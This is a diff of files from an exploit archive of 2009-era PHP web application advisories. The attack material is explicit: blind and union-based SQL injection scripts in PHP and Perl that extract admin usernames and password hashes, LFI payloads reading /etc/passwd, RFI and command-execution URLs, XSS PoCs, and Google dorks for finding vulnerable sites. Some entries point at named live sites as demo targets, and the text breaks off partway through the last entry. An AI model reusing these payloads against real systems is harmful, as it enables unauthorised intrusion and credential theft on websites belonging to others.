-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                &n bsp;           
-
-==============================================================================
-        [»] ~ Note : n0 Friends =<
-==============================================================================
-        [»] Glossword Version 1.8.11 (Uninstall/install) Script Vlun
-==============================================================================
-
-    [»] Script:             [ Glossword Version 1.8.11 ]
-    [»] Language:           [ PHP ]
-    [»] Download:           [ http://code.google.com/p/glossword/downloads/list ]
-    [»] Founder:            [ Evil-Cod3r  ]
-    [»] Gr44tz to:          [ The G0bl!n - v4-Team.Com members - Qabandi - Fl!x-Os - Mr.SaFa7 ]
-    [»] Team:               [ v4-Team ]
-    [»] SiteWeb:            [ Visit - v4-Team.Com - Creativexploit.Com ]
-    [»] Price:              [ Free ]
-
-###########################################################################
-
-===[ Exploit To Uninstall The Script  ]===   
-   
-    [»] http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall
-   
-== [ Exploit To New installation The Script ] ==
-
-    [»] http://www.Path.com/path/gw_instal l/index.php?arg[il]=english&arg[target]=install
-
-===[ LIVE DEMO ]===   
-
-        [»] http://www.dataord.com
-
-        [»] Uninstall : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=uninstall
-        [»] installation  : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=install
-
-
-Author: Evil-Cod3r <-
-
-###########################################################################
-
-# milw0rm.com [2009-07-09]
+#####################################################
+#----------------------------- Evil-Cod3r -------------------------------#                                      
+####################################################
+==============================================================================
+                      _      _       _          _      _   _
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                &n bsp;           
+
+==============================================================================
+        [»] ~ Note : n0 Friends =<
+==============================================================================
+        [»] Glossword Version 1.8.11 (Uninstall/install) Script Vlun
+==============================================================================
+
+    [»] Script:             [ Glossword Version 1.8.11 ]
+    [»] Language:           [ PHP ]
+    [»] Download:           [ http://code.google.com/p/glossword/downloads/list ]
+    [»] Founder:            [ Evil-Cod3r  ]
+    [»] Gr44tz to:          [ The G0bl!n - v4-Team.Com members - Qabandi - Fl!x-Os - Mr.SaFa7 ]
+    [»] Team:               [ v4-Team ]
+    [»] SiteWeb:            [ Visit - v4-Team.Com - Creativexploit.Com ]
+    [»] Price:              [ Free ]
+
+###########################################################################
+
+===[ Exploit To Uninstall The Script  ]===   
+   
+    [»] http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall
+   
+== [ Exploit To New installation The Script ] ==
+
+    [»] http://www.Path.com/path/gw_instal l/index.php?arg[il]=english&arg[target]=install
+
+===[ LIVE DEMO ]===   
+
+        [»] http://www.dataord.com
+
+        [»] Uninstall : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=uninstall
+        [»] installation  : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=install
+
+
+Author: Evil-Cod3r <-
+
+###########################################################################
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9089.txt b/platforms/php/webapps/9089.txt
index 10b5800b2..2674496a6 100755
--- a/platforms/php/webapps/9089.txt
+++ b/platforms/php/webapps/9089.txt
@@ -1,31 +1,31 @@
-----------------------------------------------------------------------------------------------------
-
-  Name : ClearContent
-  Site : http://www.allisclear.com/
-
-  Demo : http://demo.allisclear.com/
-
-----------------------------------------------------------------------------------------------------
-
- 
-  Found By : MizoZ [EvilWay Team]
-
-  Made in  : Morocco
-  Contact  : mizozx[at]gmail[dot]com
-  Greetz   : Moudi , Zuka , All friends
-
-
-----------------------------------------------------------------------------------------------------
-
-
-  P0c:
- 
-    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
-    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
-
-
- RFI needs register_globals=on;
-
-----------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2009-07-09]
+----------------------------------------------------------------------------------------------------
+
+  Name : ClearContent
+  Site : http://www.allisclear.com/
+
+  Demo : http://demo.allisclear.com/
+
+----------------------------------------------------------------------------------------------------
+
+ 
+  Found By : MizoZ [EvilWay Team]
+
+  Made in  : Morocco
+  Contact  : mizozx[at]gmail[dot]com
+  Greetz   : Moudi , Zuka , All friends
+
+
+----------------------------------------------------------------------------------------------------
+
+
+  P0c:
+ 
+    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
+    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
+
+
+ RFI needs register_globals=on;
+
+----------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9091.php b/platforms/php/webapps/9091.php
index 4a73cea4f..eeb8b5687 100755
--- a/platforms/php/webapps/9091.php
+++ b/platforms/php/webapps/9091.php
@@ -1,201 +1,201 @@
- 2) {
-
-echo "\nPlease wait, this will take time, el9abr zain ;)\n";
-$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
-echo "\nExploiting:\n";
-$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
-$t = abs((100-($w/$r*100)));
-echo "Username: ";
-for ($i=1; $i <= 30; $i++) {
-
-  $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$i.",1))!='0");
-
-$laenge = strlen($q);
-   if (abs((100-($laenge/$r*100))) > $t-1) {
-      $count = $i;
-      $i = 30;
-   }
-}
-for ($j = 1; $j < $count; $j++) {
-   for ($i = 46; $i <= 122; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-
-
-
-      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".$i));
-
-            
-
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-
-
-
-
-                  $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".($i-1)));
-
-
-
-
-
-      
-
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 122;
-      }
-   }
-}
-echo "\nPassword: ";
-for ($j = 1; $j <= 49; $j++) {
-   for ($i = 46; $i <= 102; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      
-
-   //          if ($j>9){
-
- //    $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i);
-
-
-       //      }
-             
-             //             if ($j<9){
-
- //    $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i);
-
-  
-     //        }
-                             //         if ($j=9){
-
-     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i,1);
-
-
-      //       }
-
-      $laenge = strlen($hg);
-
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-        
-        
-
-         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".($i-1),1));
-
-
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 102;
-      }
-   }
-}
-}
-?>
-
-# milw0rm.com [2009-07-09]
+ 2) {
+
+echo "\nPlease wait, this will take time, el9abr zain ;)\n";
+$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
+echo "\nExploiting:\n";
+$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
+$t = abs((100-($w/$r*100)));
+echo "Username: ";
+for ($i=1; $i <= 30; $i++) {
+
+  $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$i.",1))!='0");
+
+$laenge = strlen($q);
+   if (abs((100-($laenge/$r*100))) > $t-1) {
+      $count = $i;
+      $i = 30;
+   }
+}
+for ($j = 1; $j < $count; $j++) {
+   for ($i = 46; $i <= 122; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+
+
+
+      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".$i));
+
+            
+
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+
+
+
+
+                  $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from mlffat_moderators limit 0,1),".$j.",1))>'".($i-1)));
+
+
+
+
+
+      
+
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 122;
+      }
+   }
+}
+echo "\nPassword: ";
+for ($j = 1; $j <= 49; $j++) {
+   for ($i = 46; $i <= 102; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      
+
+   //          if ($j>9){
+
+ //    $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i);
+
+
+       //      }
+             
+             //             if ($j<9){
+
+ //    $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i);
+
+  
+     //        }
+                             //         if ($j=9){
+
+     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".$i,1);
+
+
+      //       }
+
+      $laenge = strlen($hg);
+
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+        
+        
+
+         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from mlffat_moderators limit 0,1),".$j.",1)) > '".($i-1),1));
+
+
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 102;
+      }
+   }
+}
+}
+?>
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9092.txt b/platforms/php/webapps/9092.txt
index ca1f2bc3f..85ce72be6 100755
--- a/platforms/php/webapps/9092.txt
+++ b/platforms/php/webapps/9092.txt
@@ -1,40 +1,40 @@
- =============================================================================================
-
- Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
- Software : WebAsyst Shop-Script
- Vendor   : http://www.webasyst.net
- 
- Date     : 03 July 2009 (Indonesia)
- Author   : Vrs-hCk
- Contact  : d00r@telkom.net
- Blog     : http://c0li.blogspot.com/
-
- =============================================================================================
-
- [-] Google Dork
-
-     "Powered by WebAsyst Shop-Script"
-
- [-] Vulnerable (Blind SQL/XSS)
-
-     index.php
-
- [-] Exploit (Blind SQL)
-
-     http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null
-
- [-] Exploit (XSS)
-
-     http://[site]/[path]/index.php?ukey=news&blog_id=
-
- =============================================================================================
-
- Greetz   :
-
-     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
-     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
-     c0li.m0de.0n and Behave oR BeGone !!!
-
- =============================================================================================
-
-# milw0rm.com [2009-07-09]
+ =============================================================================================
+
+ Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
+ Software : WebAsyst Shop-Script
+ Vendor   : http://www.webasyst.net
+ 
+ Date     : 03 July 2009 (Indonesia)
+ Author   : Vrs-hCk
+ Contact  : d00r@telkom.net
+ Blog     : http://c0li.blogspot.com/
+
+ =============================================================================================
+
+ [-] Google Dork
+
+     "Powered by WebAsyst Shop-Script"
+
+ [-] Vulnerable (Blind SQL/XSS)
+
+     index.php
+
+ [-] Exploit (Blind SQL)
+
+     http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null
+
+ [-] Exploit (XSS)
+
+     http://[site]/[path]/index.php?ukey=news&blog_id=
+
+ =============================================================================================
+
+ Greetz   :
+
+     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
+     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
+     c0li.m0de.0n and Behave oR BeGone !!!
+
+ =============================================================================================
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9094.txt b/platforms/php/webapps/9094.txt
index 1991cbb61..92830a452 100755
--- a/platforms/php/webapps/9094.txt
+++ b/platforms/php/webapps/9094.txt
@@ -1,35 +1,35 @@
-========================================================
-
-==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability
-
-========================================================
-
-==> AuThOr : BazOka-HaCkEr
-
-==> EmaiL    : wuo@hotmail.com
-
-==> HomE    :  www.TrYaG.cc/cc
-
-========================================================
-
-==> Product Page :
-
-==> http://easyvillarentalsite.com
-
-==> ExplO!te :
-
-==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
- 
-==> L!ve D3mo :
-
-==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
-
-=========================================================
-
-==> GreeTz :
-
-==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM
-
-=========================================================
-
-# milw0rm.com [2009-07-09]
+========================================================
+
+==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability
+
+========================================================
+
+==> AuThOr : BazOka-HaCkEr
+
+==> EmaiL    : wuo@hotmail.com
+
+==> HomE    :  www.TrYaG.cc/cc
+
+========================================================
+
+==> Product Page :
+
+==> http://easyvillarentalsite.com
+
+==> ExplO!te :
+
+==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
+ 
+==> L!ve D3mo :
+
+==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
+
+=========================================================
+
+==> GreeTz :
+
+==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM
+
+=========================================================
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9095.txt b/platforms/php/webapps/9095.txt
index da65927a7..29db3fb56 100755
--- a/platforms/php/webapps/9095.txt
+++ b/platforms/php/webapps/9095.txt
@@ -1,21 +1,21 @@
-JIKO No-exploit.Com
-Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
-Script : talkback V 2.3.14
-Dork:inurl:test.php Powered by TalkBack
---------------------------------------------
-Edit Comment ~[+]
-talkback/comments.php?edit=1&edit_id=2&
-Command ~[+]
-talkback/addons/import.php?result=[Command]
-        Code;
-        $last_line = system($command, $result);
-Local File ~[+]
-        Note : if floder install not deleted
-http://localhost/test/talkback/install/help.php?language=[File]
-    code;
-        $file = "../language/{$_REQUEST['language']}.php";
-    if (!is_file($file))
-        exit("Language file '$file' does not exist");
-    include ($file);
-
-# milw0rm.com [2009-07-09]
+JIKO No-exploit.Com
+Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
+Script : talkback V 2.3.14
+Dork:inurl:test.php Powered by TalkBack
+--------------------------------------------
+Edit Comment ~[+]
+talkback/comments.php?edit=1&edit_id=2&
+Command ~[+]
+talkback/addons/import.php?result=[Command]
+        Code;
+        $last_line = system($command, $result);
+Local File ~[+]
+        Note : if floder install not deleted
+http://localhost/test/talkback/install/help.php?language=[File]
+    code;
+        $file = "../language/{$_REQUEST['language']}.php";
+    if (!is_file($file))
+        exit("Language file '$file' does not exist");
+    include ($file);
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9098.txt b/platforms/php/webapps/9098.txt
index 55b000461..6f4fd3116 100755
--- a/platforms/php/webapps/9098.txt
+++ b/platforms/php/webapps/9098.txt
@@ -1,74 +1,74 @@
-========================================================================================================================================================
-
-
-  [o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability
-
-       Software : Siteframe CMS version 3.2.x
-       Vendor   : http://siteframe.org/
-       Download : http://sitefrane.org/downloads/
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-========================================================================================================================================================
-
-
-  [o] Description
-
-       Siteframe™ is a lightweight content-management system
-       designed for the rapid deployment of community-based websites.
-       With Siteframe, a group of users can share stories and photographs,
-       create blogs, send email to one another, and participate in group activities.
-       Siteframe enables this by providing web-based content management
-       so that anyone can create content without needing to learn HTML.
-
-
-
-  [o] Vulnerable file
-
-       document.php
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/document.php?id=[SQL]
-       http://localhost/[path]/phpinfo.php
-
-
-
-  [o] Proof of concept
-
-       http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
-       http://digi-forum.com/frame/phpinfo.php
-       http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
-       http://myolympus.org/phpinfo.php
-
-
-
-  [o] Dork
-
-       "Powered by Siteframe"
-
-
-
-  [o] Notes
-
-       Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)
-
-
-========================================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/news ]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
-       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
-       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
-
-
-========================================================================================================================================================
-
-# milw0rm.com [2009-07-09]
+========================================================================================================================================================
+
+
+  [o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability
+
+       Software : Siteframe CMS version 3.2.x
+       Vendor   : http://siteframe.org/
+       Download : http://sitefrane.org/downloads/
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+========================================================================================================================================================
+
+
+  [o] Description
+
+       Siteframe™ is a lightweight content-management system
+       designed for the rapid deployment of community-based websites.
+       With Siteframe, a group of users can share stories and photographs,
+       create blogs, send email to one another, and participate in group activities.
+       Siteframe enables this by providing web-based content management
+       so that anyone can create content without needing to learn HTML.
+
+
+
+  [o] Vulnerable file
+
+       document.php
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/document.php?id=[SQL]
+       http://localhost/[path]/phpinfo.php
+
+
+
+  [o] Proof of concept
+
+       http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
+       http://digi-forum.com/frame/phpinfo.php
+       http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
+       http://myolympus.org/phpinfo.php
+
+
+
+  [o] Dork
+
+       "Powered by Siteframe"
+
+
+
+  [o] Notes
+
+       Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)
+
+
+========================================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/news ]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
+       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
+       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
+
+
+========================================================================================================================================================
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9099.pl b/platforms/php/webapps/9099.pl
index 0ff421d47..1c27e332b 100755
--- a/platforms/php/webapps/9099.pl
+++ b/platforms/php/webapps/9099.pl
@@ -1,39 +1,39 @@
-#!/usr/bin/perl -w
-# Universe CMS 1.0.6 (id) Remote SQL Injection Exploit
-# Demo : http://www.universe.uni.org.pl
-# Download : http://www.universe.uni.org.pl/upload/universecms106.rar
-# Found by : Mr.tro0oqy 
-# E-mail : t.4@windowslive.com
-# special thank for my teacher "Stack"
-########################################
-system("color e");
-print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
-print "\t\t0  Universe CMS 1.0.6 (id) Remote SQL Injection Exploit   0\n\n";
-print "\t\t0                       by Mr.tro0oqy                     0\n\n";
-print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
-use LWP::UserAgent;
-die "Example: perl $0 http://target.com/path \n" unless @ARGV;
-$user="login";
-$pass="password";
-$tab="uni_users";
-$b = LWP::UserAgent->new() or die "error\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "/vnews.php?id=-1+union+select+1,2,3,4,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),6+from+".$tab."&print=1";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-if ($answer =~ /(.*?)/){
-        print "\ loading .....\n";
-        print "\n[+] Admin User : $1";
-}
-if ($answer =~/(.*?)/)
-{
-print "\n[+] Admin Hash : $1\n\n";
-print "\t\t#   %100   #\n\n";}
-
-else
-{
-print "\n[-] Exploit Failed...\n";
-}
-
-# milw0rm.com [2009-07-09]
+#!/usr/bin/perl -w
+# Universe CMS 1.0.6 (id) Remote SQL Injection Exploit
+# Demo : http://www.universe.uni.org.pl
+# Download : http://www.universe.uni.org.pl/upload/universecms106.rar
+# Found by : Mr.tro0oqy 
+# E-mail : t.4@windowslive.com
+# special thank for my teacher "Stack"
+########################################
+system("color e");
+print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
+print "\t\t0  Universe CMS 1.0.6 (id) Remote SQL Injection Exploit   0\n\n";
+print "\t\t0                       by Mr.tro0oqy                     0\n\n";
+print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
+use LWP::UserAgent;
+die "Example: perl $0 http://target.com/path \n" unless @ARGV;
+$user="login";
+$pass="password";
+$tab="uni_users";
+$b = LWP::UserAgent->new() or die "error\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "/vnews.php?id=-1+union+select+1,2,3,4,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),6+from+".$tab."&print=1";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+if ($answer =~ /(.*?)/){
+        print "\ loading .....\n";
+        print "\n[+] Admin User : $1";
+}
+if ($answer =~/(.*?)/)
+{
+print "\n[+] Admin Hash : $1\n\n";
+print "\t\t#   %100   #\n\n";}
+
+else
+{
+print "\n[-] Exploit Failed...\n";
+}
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/910.pl b/platforms/php/webapps/910.pl
index a8fd8c8b3..458e4ec20 100755
--- a/platforms/php/webapps/910.pl
+++ b/platforms/php/webapps/910.pl
@@ -67,6 +67,6 @@ while ($answer = <$socket>)
 }
 print "  [-] Exploit failed\n";
 
-#### EOF ####
-
-# milw0rm.com [2005-04-04]
+#### EOF ####
+
+# milw0rm.com [2005-04-04]
diff --git a/platforms/php/webapps/9101.txt b/platforms/php/webapps/9101.txt
index 9f5f846fc..277697860 100755
--- a/platforms/php/webapps/9101.txt
+++ b/platforms/php/webapps/9101.txt
@@ -1,68 +1,68 @@
-phpBMS v0.96
-phpbms.org
-
-eLwaux(c)2009, uasc.org.ua
-http://phpbms.org/trial/
-
-
-## ## ##
-SQL Inj
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-	$querystatement="SELECT
-if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)
-                  AS value FROM discounts WHERE id=".$_GET["id"];
-	$queryresult = $db->query($querystatement);
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())
-
-
-
-## ## ##
-SQL Inj
-\dbgraphic.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-        $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM
-".$_GET["t"]." WHERE id=".$_GET["r"];
-	$queryresult=$db->query($querystatement);
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1
-
-
-## ## ##
-SQL Inj
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-	if(isset($_GET["cmd"])){
-		switch($_GET["cmd"]){
-			case "show":
-				showSearch($_GET["tid"],$_GET["base"],$db);
-			break;
-		}//end switch
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-PoC:
-	/advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2
-	/advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2
-
-
-## ## ##
-pXSS
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-        
    ">
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-PoC:
-     \index.php/">
    {XSS}
-     \phpbms\modules\base\adminsettings.php\">{XSS}
-
-
-## ## ##
-Path Disclosure
-     /footer.php
-     /header.php
-     /advancedsearch.php?cmd=show&
-     /choicelist.php
-
-# milw0rm.com [2009-07-10]
+phpBMS v0.96
+phpbms.org
+
+eLwaux(c)2009, uasc.org.ua
+http://phpbms.org/trial/
+
+
+## ## ##
+SQL Inj
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+	$querystatement="SELECT
+if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)
+                  AS value FROM discounts WHERE id=".$_GET["id"];
+	$queryresult = $db->query($querystatement);
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())
+
+
+
+## ## ##
+SQL Inj
+\dbgraphic.php
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+        $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM
+".$_GET["t"]." WHERE id=".$_GET["r"];
+	$queryresult=$db->query($querystatement);
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1
+
+
+## ## ##
+SQL Inj
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+	if(isset($_GET["cmd"])){
+		switch($_GET["cmd"]){
+			case "show":
+				showSearch($_GET["tid"],$_GET["base"],$db);
+			break;
+		}//end switch
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+PoC:
+	/advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2
+	/advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2
+
+
+## ## ##
+pXSS
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+        ">
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+PoC:
+     \index.php/">
    {XSS}
+     \phpbms\modules\base\adminsettings.php\">{XSS}
+
+
+## ## ##
+Path Disclosure
+     /footer.php
+     /header.php
+     /advancedsearch.php?cmd=show&
+     /choicelist.php
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9103.txt b/platforms/php/webapps/9103.txt
index d9e520cab..1258d9d37 100755
--- a/platforms/php/webapps/9103.txt
+++ b/platforms/php/webapps/9103.txt
@@ -1,43 +1,43 @@
-GenCMS
-http://gencms.berlios.de/
-
-eLwaux(c)2009
-
-LFI
-/show.php
-----------------------------------------------------------------------------------------------------
-18:   $param = $_GET['p'];
-19:   if(empty($param)) $param = 'news';
-20:          //get right page
-21:       //$page = $param.'.php';
-22:	
-23:    //static or dynamic
-24:    if(GC_FULLSTATIC)
-25:    {
-26:        $page = $param.'.htm';
-27:        staticpage($page);
-28:    }
-29:    else
-30:    {
-31:        $page = GC_IPATH.'_base/sites/'.$param.'.php';
-32:        dynamicpage($page);
-33:    }
-----------------------------------------------------------------------------------------------------
-PoC: /show.php?p=../../{FILE.PHP}%00
-
-
-LFI
-/admin/pages/SiteNew.php
-----------------------------------------------------------------------------------------------------
-14:   if(!empty($_GET['step'])) $Step = $_GET['step'];
-23:   if ($Step == "2")
-24:   {
-25:        // allgemeine settings
-26:        //include blocks from template config
-27:        include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
-28:        $TPLBlocks = explode(';',$TemplateSettings);
-29:   }
-----------------------------------------------------------------------------------------------------
